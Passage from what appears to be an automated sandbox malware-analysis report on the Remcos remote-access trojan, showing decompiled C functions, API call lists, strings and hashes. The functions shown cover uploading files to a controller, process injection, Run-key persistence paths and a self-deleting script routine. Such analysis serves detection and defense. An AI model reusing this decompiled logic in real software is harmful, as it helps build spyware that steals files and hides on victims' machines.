                    								__eflags = _t211 - _v52;
                    							} while (_t211 < _v52);
                    							goto L17;
                    						} else {
                    							__eflags = _v52;
                    							if(_v52 <= 0) {
                    								goto L17;
                    							} else {
                    								goto L5;
                    							}
                    						}
                    					}
                    				} else {
                    					E10592F5A(0, _t303 - 0x18, _t279, _t311,  &_a8);
                    					_push(0x53);
                    					E10595912(0, 0x46c2e8, _t279, _t311);
                    					L24:
                    					E10595C79(_t300);
                    					_t146 = 0;
                    					L25:
                    					_t199 = _t146;
                    				}
                    				L18:
                    				E10592E35();
                    				E10592E35();
                    				E10592E35();
                    				return _t199;
                    			}

                    APIs
                      • Part of subcall function 10595876: connect.WS2_32(?,0046DBA0,00000010), ref: 10595891
                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 1059735B
                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 10597392
                    • __aulldiv.LIBCMT ref: 10597414
                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 10597482
                    • ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 1059749D
                      • Part of subcall function 10595912: send.WS2_32(?,00000000,00000000,00000000), ref: 10595986
                      • Part of subcall function 10595C79: closesocket.WS2_32(?), ref: 10595C7F
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: File$CreatePointerReadSize__aulldivclosesocketconnectsend
                    • String ID: Uploading file to Controller: $[Info]
                    • API String ID: 1319223106-4259670467
                    • Opcode ID: 2d05a661a40501580d00d11df3961e3b901cdc1a328e145ed3d3c9b916ec5bf8
                    • Instruction ID: 2e9c20003c77b0033156f36b43e51e8c32ee12ce2963a53cbe8d7171966b36c9
                    • Opcode Fuzzy Hash: 2d05a661a40501580d00d11df3961e3b901cdc1a328e145ed3d3c9b916ec5bf8
                    • Instruction Fuzzy Hash: 2BC12B35E001189BCF04EFA4DC96AEEBB79EF88351F1081AAF405A6291EF316E45CB55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 97%
                    			E0040CE44(void* __eflags, char _a4) {
                    				void* _v8;
                    				char _v32;
                    				char _v56;
                    				char _v60;
                    				char _v64;
                    				char _v68;
                    				char _v72;
                    				char _v96;
                    				char _v120;
                    				char _v648;
                    				intOrPtr _v676;
                    				void* _v684;
                    				short _v1204;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* _t76;
                    				struct _SECURITY_ATTRIBUTES* _t106;
                    				char* _t111;
                    				void* _t158;
                    				void* _t161;
                    
                    				_t106 = 0;
                    				GetModuleFileNameW(0,  &_v1204, 0x104);
                    				_t149 = "1";
                    				if(E00407744("1") != 0) {
                    					L14:
                    					E00401EFA( &_a4, _t149, _t159, E00416E1B(_t106,  &_v120, _t149));
                    					_t111 =  &_v120;
                    					E00401EF0();
                    					if(E00417614(_t111) != 0) {
                    						_push(_t111);
                    						if(E0040D4AF( &_a4, L"Program Files\\") != 0xffffffff) {
                    							E0040D4D0(_t106,  &_a4, _t157, _t73, 0xe, L"Program Files (x86)\\");
                    						}
                    					}
                    					if(E0040EAE5( &_v1204,  &_a4) != 0) {
                    						L22:
                    						E00401EF0();
                    						return _t106;
                    					} else {
                    						L18:
                    						_t158 = CreateMutexA(_t106, 1, "Remcos_Mutex_Inj");
                    						E004020D5(_t106,  &_v96);
                    						E004179DC(E00401EEB(0x46c500),  &_v96);
                    						E00401F95( &_v96);
                    						if(E0041432B(E00401EEB( &_a4)) == 0) {
                    							CloseHandle(_t158);
                    						} else {
                    							_t106 = 1;
                    							E00410BB0(0x46c518, E00401F95(0x46c518), "Inj", 1);
                    						}
                    						E00401FC7();
                    						goto L22;
                    					}
                    				}
                    				E00401F6D(0,  &_v32);
                    				_t76 = CreateToolhelp32Snapshot(2, 0);
                    				_v8 = _t76;
                    				_v684 = 0x22c;
                    				Process32FirstW(_t76,  &_v684);
                    				while(Process32NextW(_v8,  &_v684) != 0) {
                    					E0040427F(_t106,  &_v56,  &_v648);
                    					_t157 = E0040230A( &_v56,  &_v60);
                    					_t159 = E004022CD( &_v56,  &_v64);
                    					E00408226( &_v72,  *((intOrPtr*)(E0040230A( &_v56,  &_v68))),  *_t84,  *_t82);
                    					_t161 = _t161 + 0xc;
                    					if(E00409EAC( &_a4) != 0) {
                    						E00401EFA( &_v32, _v676, _t159, E00417678( &_v120, _v676));
                    						E00401EF0();
                    						if(E00407744( &_v1204) == 0) {
                    							_t149 = 0x45f724;
                    							if(E00407744(0x45f724) != 0 || E00417642(_v676) != 0) {
                    								E00401EF0();
                    								L13:
                    								E00401EF0();
                    								goto L14;
                    							} else {
                    								E00409E56( &_v32);
                    								E00401EF0();
                    								break;
                    							}
                    						}
                    						E00401EF0();
                    						E00401EF0();
                    						goto L22;
                    					}
                    					E00401EF0();
                    				}
                    				CloseHandle(_v8);
                    				_t149 = 0x45f724;
                    				if(E00407744(0x45f724) != 0) {
                    					goto L13;
                    				}
                    				E00401EF0();
                    				goto L18;
                    			}

                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,0046C578,00000000,00000001), ref: 0040CE5F
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0040CE85
                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040CEA0
                    • Process32NextW.KERNEL32(0040C873,0000022C), ref: 0040CF11
                    • CloseHandle.KERNEL32(0040C873,?,00000000,?,?,?), ref: 0040CF1E
                    • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj,00000000), ref: 0040D034
                    • CloseHandle.KERNEL32(00000000), ref: 0040D096
                      • Part of subcall function 00417678: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041768D
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                    • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                    • API String ID: 193334293-694575909
                    • Opcode ID: 55f3dd7fb2b55a96c3bd64f667631c5fd3453a660e7ed20f19c4ddaeb283a6ae
                    • Instruction ID: 3510060cf9a437f77219ea037c9ff0ee2f7dfe89619f545013c5fab9df6787a0
                    • Opcode Fuzzy Hash: 55f3dd7fb2b55a96c3bd64f667631c5fd3453a660e7ed20f19c4ddaeb283a6ae
                    • Instruction Fuzzy Hash: FD6124309001099BCF14EFA1D9959EE7736AF10349F10417FB806771E2EF786E4ADA59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 97%
                    			E00448880(void* __edx, char _a4) {
                    				void* _v8;
                    				void* _v12;
                    				signed int _v16;
                    				intOrPtr* _v20;
                    				signed int _v24;
                    				char _v28;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t105;
                    				char _t195;
                    				char _t210;
                    				signed int _t213;
                    				void* _t224;
                    				char* _t226;
                    				signed int _t227;
                    				signed int _t231;
                    				signed int _t232;
                    				void* _t234;
                    				void* _t236;
                    				signed int _t237;
                    				signed int _t238;
                    				signed int _t239;
                    				signed int _t240;
                    				signed int _t241;
                    				signed int _t242;
                    				signed int _t243;
                    				signed int _t244;
                    				signed int _t245;
                    				signed int _t246;
                    				signed int _t247;
                    				signed int _t248;
                    				signed int _t249;
                    				signed int _t250;
                    				signed int _t251;
                    				signed int _t252;
                    				signed int _t253;
                    				signed int _t254;
                    				signed int _t255;
                    				signed int _t256;
                    				char* _t257;
                    
                    				_t224 = __edx;
                    				_t210 = _a4;
                    				_v16 = 0;
                    				_v28 = _t210;
                    				_v24 = 0;
                    				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
                    					_t234 = E0043F348(0, 1, 0x50);
                    					_v8 = _t234;
                    					E004401F5(0);
                    					if(_t234 != 0) {
                    						_t227 = E0043F348(0, 1, 4);
                    						_v12 = _t227;
                    						E004401F5(0);
                    						if(_t227 != 0) {
                    							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
                    								_t213 = 0x14;
                    								memcpy(_v8, 0x46a188, _t213 << 2);
                    								L25:
                    								_t236 = _v8;
                    								_t231 = _v16;
                    								 *_t236 =  *( *(_t210 + 0x88));
                    								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
                    								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
                    								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
                    								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
                    								 *_v12 = 1;
                    								if(_t231 != 0) {
                    									 *_t231 = 1;
                    								}
                    								goto L27;
                    							}
                    							_t232 = E0043F348(0, 1, 4);
                    							_v16 = _t232;
                    							E004401F5(0);
                    							if(_t232 != 0) {
                    								_t233 =  *((intOrPtr*)(_t210 + 0xac));
                    								_t14 = _t234 + 0xc; // 0xc
                    								_t237 = E0044B0F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x15, _t14);
                    								_t238 = _t237 | E0044B0F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x14, _v8 + 0x10);
                    								_t239 = _t238 | E0044B0F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
                    								_t240 = _t239 | E0044B0F4(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
                    								_v20 = _v8 + 0x1c;
                    								_t241 = _t240 | E0044B0F4(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
                    								_t242 = _t241 | E0044B0F4(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
                    								_t243 = _t242 | E0044B0F4(_t210, _t224, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
                    								_t244 = _t243 | E0044B0F4(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
                    								_t245 = _t244 | E0044B0F4(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
                    								_t246 = _t245 | E0044B0F4(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
                    								_t247 = _t246 | E0044B0F4(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
                    								_t248 = _t247 | E0044B0F4(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
                    								_t249 = _t248 | E0044B0F4(_t210, _t224, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
                    								_t250 = _t249 | E0044B0F4(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
                    								_t251 = _t250 | E0044B0F4(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
                    								_t252 = _t251 | E0044B0F4(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
                    								_t253 = _t252 | E0044B0F4(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
                    								_t254 = _t253 | E0044B0F4(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
                    								_t255 = _t254 | E0044B0F4(_t210, _t224, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
                    								_t256 = _t255 | E0044B0F4(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
                    								if((E0044B0F4(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
                    									_t226 =  *_v20;
                    									while( *_t226 != 0) {
                    										_t195 =  *_t226;
                    										if(_t195 < 0x30 || _t195 > 0x39) {
                    											if(_t195 != 0x3b) {
                    												goto L17;
                    											}
                    											_t257 = _t226;
                    											do {
                    												 *_t257 =  *((intOrPtr*)(_t257 + 1));
                    												_t257 = _t257 + 1;
                    											} while ( *_t257 != 0);
                    										} else {
                    											 *_t226 = _t195 - 0x30;
                    											L17:
                    											_t226 = _t226 + 1;
                    										}
                    									}
                    									goto L25;
                    								}
                    								E00448782(_v8);
                    								E004401F5(_v8);
                    								E004401F5(_v12);
                    								E004401F5(_v16);
                    								goto L4;
                    							}
                    							E004401F5(_t234);
                    							E004401F5(_v12);
                    							L7:
                    							goto L4;
                    						}
                    						E004401F5(_t234);
                    						goto L7;
                    					}
                    					L4:
                    					return 1;
                    				} else {
                    					_t231 = 0;
                    					_v12 = 0;
                    					_t236 = 0x46a188;
                    					L27:
                    					_t105 =  *(_t210 + 0x84);
                    					if(_t105 != 0) {
                    						asm("lock dec dword [eax]");
                    					}
                    					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
                    						asm("lock xadd [ecx], eax");
                    						if((_t105 | 0xffffffff) == 0) {
                    							E004401F5( *(_t210 + 0x88));
                    							E004401F5( *((intOrPtr*)(_t210 + 0x7c)));
                    						}
                    					}
                    					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
                    					 *(_t210 + 0x84) = _t231;
                    					 *(_t210 + 0x88) = _t236;
                    					return 0;
                    				}
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: a9f8539c7d8899899db9d987fa52c4c806cbca7fbe9b42a804e217705a4c1dd9
                    • Instruction ID: 0fd459aec3f5e05b68cc896b93c3b77f39616f80babc804ed9fa449a4b9e12b5
                    • Opcode Fuzzy Hash: a9f8539c7d8899899db9d987fa52c4c806cbca7fbe9b42a804e217705a4c1dd9
                    • Instruction Fuzzy Hash: 0EC10571E40204AFEB20DBA9CC42FEF77F8EB49705F14415AFB05EB282D6B499419798
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E1059BF50(char _a4) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				char _v148;
                    				char _v172;
                    				short _v692;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				void* _t53;
                    				void* _t54;
                    				void* _t57;
                    				signed int _t61;
                    				void* _t62;
                    				void* _t78;
                    				void* _t79;
                    				void* _t92;
                    				void* _t93;
                    				signed char _t134;
                    				intOrPtr* _t236;
                    
                    				E105A0FC9();
                    				if( *0x46a9d4 != 0x30) {
                    					E1059ABE1();
                    				}
                    				_t243 =  *0x46bd6b - 1;
                    				if( *0x46bd6b == 1) {
                    					E105A61EC(_t243);
                    				}
                    				if( *0x46ba75 != 0) {
                    					E105A85C2(E10592D59(0x46c0e0));
                    				}
                    				if( *0x46bb02 == 1) {
                    					E105A1BCA(0x80000001, 0x45ff08, E10592D59(0x46c4e8));
                    				}
                    				if( *0x46bafb == 1) {
                    					E105A1BCA(0x80000002, 0x45ff08, E10592D59(0x46c4e8));
                    				}
                    				if( *0x46bb00 == 1) {
                    					E105A1BCA(0x80000002, 0x45ff68, E10592D59(0x46c4e8));
                    				}
                    				_t53 = E105932F7();
                    				_t54 = E10592E03(0x46c560);
                    				_t57 = E105A189E(E10592E03(0x46c518), 0x460190,  &_v692, 0x208, _t54, _t53);
                    				_t248 = _t57;
                    				if(_t57 == 0) {
                    					GetModuleFileNameW(0,  &_v692, 0x208);
                    				}
                    				RegDeleteKeyA(0x80000001, E10592E03(0x46c518));
                    				_t236 =  *0x453238;
                    				_t61 =  *_t236( &_v692, 0x80);
                    				_t140 = 0x46c530;
                    				asm("sbb bl, bl");
                    				_t134 =  ~_t61 & 0x00000001;
                    				_t62 = E10598352(_t248);
                    				_t249 = _t62;
                    				if(_t62 != 0) {
                    					_t140 = 0x46c530;
                    					 *_t236(E10592D59(0x46c530), 0x80);
                    				}
                    				E10593F14(_t134,  &_v124, E105950ED(_t134,  &_v52, E105CA6ED(_t134, _t140, _t249, 0x460008)), 0, _t249, 0x460268);
                    				E10592D5E();
                    				E10595273(_t134,  &_v28, 0x4601a4, _t249, E105950ED(_t134,  &_v52, 0x460040));
                    				E10592D5E();
                    				_t250 = _t134;
                    				if(_t134 != 0) {
                    					E1059417F(E10593F14(_t134,  &_v52, E10595273(_t134,  &_v76, 0x4601d8, _t250, E105950ED(_t134,  &_v100,  &_v692)), 0, _t250, 0x4601d0));
                    					E10592D5E();
                    					E10592D5E();
                    					E10592D5E();
                    				}
                    				E1059417F(E10593F14(_t134,  &_v100, E10593F14(_t134,  &_v76, E105950ED(_t134,  &_v52, 0x460210), 0, _t250,  &_v692), 0, _t250, 0x460208));
                    				E10592D5E();
                    				E10592D5E();
                    				E10592D5E();
                    				_t251 = _t134;
                    				if(_t134 != 0) {
                    					E105984DA(_t134,  &_v28, 0, 0x460234);
                    				}
                    				_t78 = E10598352(_t251);
                    				_t252 = _t78;
                    				if(_t78 != 0) {
                    					E1059417F(E10593F14(0x45f724,  &_v100, E1059ACD7( &_v76, 0x460240, _t252, 0x46c530), 0, _t252, 0x460208));
                    					E10592D5E();
                    					E10592D5E();
                    				}
                    				_t79 = E105950ED(0x45f724,  &_v172, 0x4600d0);
                    				E1059417F(E10593F14(0x45f724,  &_v100, E10593E9E( &_v76, E10595297(0x45f724,  &_v52, E105950ED(0x45f724,  &_v148, 0x4600e0), _t252,  &_a4), _t79), 0, _t252, 0x4600ac));
                    				E10592D5E();
                    				E10592D5E();
                    				E10592D5E();
                    				E10592D5E();
                    				E10592D5E();
                    				E105984DA(0x45f724,  &_v28, 0, 0x460140);
                    				_t92 = E10592D59( &_v124);
                    				_t93 = E105932F7();
                    				if(E105A87B5(E10592D59( &_v28), _t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, 0x45f6e4, E10592D59( &_v124), 0x45f724, 0x45f724, 0) > 0x20) {
                    					ExitProcess(0);
                    				}
                    				E10592D5E();
                    				E10592D5E();
                    				return E10592D5E();
                    			}

                    APIs
                      • Part of subcall function 105A0FC9: TerminateProcess.KERNEL32(00000000,?,1059BC03), ref: 105A0FD9
                      • Part of subcall function 105A0FC9: WaitForSingleObject.KERNEL32(000000FF,?,1059BC03), ref: 105A0FEC
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 1059C049
                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 1059C05C
                      • Part of subcall function 1059ABE1: DeleteFileW.KERNEL32(00000000,?,?,1059BC11), ref: 1059ABB1
                      • Part of subcall function 1059ABE1: RemoveDirectoryW.KERNEL32(00000000,?,?,1059BC11), ref: 1059ABD6
                      • Part of subcall function 1059ABE1: TerminateThread.KERNEL32(0040884B,00000000,?,1059BC11), ref: 1059ABF0
                      • Part of subcall function 1059ABE1: UnhookWindowsHookEx.USER32(0046C350), ref: 1059AC00
                      • Part of subcall function 1059ABE1: TerminateThread.KERNEL32(00408830,00000000,?,1059BC11), ref: 1059AC12
                      • Part of subcall function 105A87B5: CreateFileW.KERNEL32(10596BD7,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000004,00000000,00000000,?,105A88DF,00000000,00000000), ref: 105A87F4
                    • ShellExecuteW.SHELL32(00000000,0045F6E4,00000000,0045F724,0045F724,00000000), ref: 1059C2C5
                    • ExitProcess.KERNEL32 ref: 1059C2D1
                    Strings
                    • Remcos, xrefs: 1059BF99
                    • fso.DeleteFolder ", xrefs: 1059C1C5
                    • while fso.FileExists(", xrefs: 1059C10D
                    • Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 1059BF9E
                    • On Error Resume Next, xrefs: 1059C0DE
                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 1059BFED
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: FileTerminate$DeleteProcessThread$CreateDirectoryExecuteExitHookModuleNameObjectRemoveShellSingleUnhookWaitWindows
                    • String ID: On Error Resume Next$Remcos$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$fso.DeleteFolder "$while fso.FileExists("
                    • API String ID: 774052570-1409672675
                    • Opcode ID: 32129de1932d1c29b9960b25ed1ce55d8a6a858bca0eed3546b7f515e473f87f
                    • Instruction ID: ba018c7ee5c78d3d04bed26c10c968710a72639207a9201238017a73f617da97
                    • Opcode Fuzzy Hash: 32129de1932d1c29b9960b25ed1ce55d8a6a858bca0eed3546b7f515e473f87f
                    • Instruction Fuzzy Hash: 60916139A002189ADB04EB60EC5AEFF7F69EF90640F10406EB406670A5FF647D4BCB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 41%
                    			E0044F255(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                    				signed int _v5;
                    				char _v6;
                    				void* _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				char _v24;
                    				intOrPtr _v36;
                    				signed int _v44;
                    				void _v48;
                    				char _v72;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t114;
                    				signed int _t123;
                    				signed char _t124;
                    				signed int _t134;
                    				intOrPtr _t164;
                    				intOrPtr _t180;
                    				signed int* _t190;
                    				signed int _t192;
                    				char _t197;
                    				signed int _t203;
                    				signed int _t206;
                    				signed int _t215;
                    				signed int _t217;
                    				signed int _t219;
                    				signed int _t225;
                    				signed int _t227;
                    				signed int _t234;
                    				signed int _t235;
                    				signed int _t237;
                    				signed int _t239;
                    				signed char _t242;
                    				intOrPtr _t245;
                    				void* _t248;
                    				void* _t252;
                    				void* _t262;
                    				signed int _t263;
                    				signed int _t266;
                    				signed int _t269;
                    				signed int _t270;
                    				void* _t272;
                    				void* _t274;
                    				void* _t275;
                    				void* _t277;
                    				void* _t278;
                    				void* _t280;
                    				void* _t284;
                    
                    				_t262 = E0044EFB8(__ecx,  &_v72, _a16, _a20, _a24);
                    				_t192 = 6;
                    				memcpy( &_v48, _t262, _t192 << 2);
                    				_t274 = _t272 + 0x1c;
                    				_t248 = _t262 + _t192 + _t192;
                    				_t263 = _t262 | 0xffffffff;
                    				if(_v36 != _t263) {
                    					_t114 = E00448575(_t248, _t263, __eflags);
                    					_t190 = _a8;
                    					 *_t190 = _t114;
                    					__eflags = _t114 - _t263;
                    					if(_t114 != _t263) {
                    						_v20 = _v20 & 0x00000000;
                    						_v24 = 0xc;
                    						_t275 = _t274 - 0x18;
                    						 *_a4 = 1;
                    						_push(6);
                    						_v16 =  !(_a16 >> 7) & 1;
                    						_push( &_v24);
                    						_push(_a12);
                    						memcpy(_t275,  &_v48, 1 << 2);
                    						_t197 = 0;
                    						_t252 = E0044EF23();
                    						_t277 = _t275 + 0x2c;
                    						_v12 = _t252;
                    						__eflags = _t252 - 0xffffffff;
                    						if(_t252 != 0xffffffff) {
                    							L11:
                    							_t123 = GetFileType(_t252);
                    							__eflags = _t123;
                    							if(_t123 != 0) {
                    								__eflags = _t123 - 2;
                    								if(_t123 != 2) {
                    									__eflags = _t123 - 3;
                    									_t124 = _v48;
                    									if(_t123 == 3) {
                    										_t124 = _t124 | 0x00000008;
                    										__eflags = _t124;
                    									}
                    								} else {
                    									_t124 = _v48 | 0x00000040;
                    								}
                    								_v5 = _t124;
                    								E004484BE(_t197,  *_t190, _t252);
                    								_t242 = _v5 | 0x00000001;
                    								_v5 = _t242;
                    								_v48 = _t242;
                    								 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
                    								_t203 =  *_t190;
                    								_t205 = (_t203 & 0x0000003f) * 0x30;
                    								__eflags = _a16 & 0x00000002;
                    								 *((char*)( *((intOrPtr*)(0x46b800 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
                    								if((_a16 & 0x00000002) == 0) {
                    									L20:
                    									_v6 = 0;
                    									_push( &_v6);
                    									_push(_a16);
                    									_t278 = _t277 - 0x18;
                    									_t206 = 6;
                    									_push( *_t190);
                    									memcpy(_t278,  &_v48, _t206 << 2);
                    									_t134 = E0044ECD6(_t190,  &_v48 + _t206 + _t206,  &_v48);
                    									_t280 = _t278 + 0x30;
                    									__eflags = _t134;
                    									if(__eflags == 0) {
                    										 *((char*)( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
                    										 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
                    										__eflags = _v5 & 0x00000048;
                    										if((_v5 & 0x00000048) == 0) {
                    											__eflags = _a16 & 0x00000008;
                    											if((_a16 & 0x00000008) != 0) {
                    												_t225 =  *_t190;
                    												_t227 = (_t225 & 0x0000003f) * 0x30;
                    												_t164 =  *((intOrPtr*)(0x46b800 + (_t225 >> 6) * 4));
                    												_t87 = _t164 + _t227 + 0x28;
                    												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
                    												__eflags =  *_t87;
                    											}
                    										}
                    										_t266 = _v44;
                    										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
                    										if((_t266 & 0xc0000000) != 0xc0000000) {
                    											L31:
                    											__eflags = 0;
                    											return 0;
                    										} else {
                    											__eflags = _a16 & 0x00000001;
                    											if((_a16 & 0x00000001) == 0) {
                    												goto L31;
                    											}
                    											CloseHandle(_v12);
                    											_v44 = _t266 & 0x7fffffff;
                    											_t215 = 6;
                    											_push( &_v24);
                    											_push(_a12);
                    											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
                    											_t245 = E0044EF23();
                    											__eflags = _t245 - 0xffffffff;
                    											if(_t245 != 0xffffffff) {
                    												_t217 =  *_t190;
                    												_t219 = (_t217 & 0x0000003f) * 0x30;
                    												__eflags = _t219;
                    												 *((intOrPtr*)( *((intOrPtr*)(0x46b800 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
                    												goto L31;
                    											}
                    											E0043A4CE(GetLastError());
                    											 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                    											E00448687( *_t190);
                    											L10:
                    											goto L2;
                    										}
                    									}
                    									_t269 = _t134;
                    									goto L22;
                    								} else {
                    									_t269 = E0044F134(_t205,  *_t190);
                    									__eflags = _t269;
                    									if(__eflags != 0) {
                    										L22:
                    										E0044551E(__eflags,  *_t190);
                    										return _t269;
                    									}
                    									goto L20;
                    								}
                    							}
                    							_t270 = GetLastError();
                    							E0043A4CE(_t270);
                    							 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                    							CloseHandle(_t252);
                    							__eflags = _t270;
                    							if(_t270 == 0) {
                    								 *((intOrPtr*)(E0043A504())) = 0xd;
                    							}
                    							goto L2;
                    						}
                    						_t234 = _v44;
                    						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
                    						if((_t234 & 0xc0000000) != 0xc0000000) {
                    							L9:
                    							_t235 =  *_t190;
                    							_t237 = (_t235 & 0x0000003f) * 0x30;
                    							_t180 =  *((intOrPtr*)(0x46b800 + (_t235 >> 6) * 4));
                    							_t33 = _t180 + _t237 + 0x28;
                    							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
                    							__eflags =  *_t33;
                    							E0043A4CE(GetLastError());
                    							goto L10;
                    						}
                    						__eflags = _a16 & 0x00000001;
                    						if((_a16 & 0x00000001) == 0) {
                    							goto L9;
                    						}
                    						_t284 = _t277 - 0x18;
                    						_v44 = _t234 & 0x7fffffff;
                    						_t239 = 6;
                    						_push( &_v24);
                    						_push(_a12);
                    						memcpy(_t284,  &_v48, _t239 << 2);
                    						_t197 = 0;
                    						_t252 = E0044EF23();
                    						_t277 = _t284 + 0x2c;
                    						_v12 = _t252;
                    						__eflags = _t252 - 0xffffffff;
                    						if(_t252 != 0xffffffff) {
                    							goto L11;
                    						}
                    						goto L9;
                    					} else {
                    						 *(E0043A4F1()) =  *_t186 & 0x00000000;
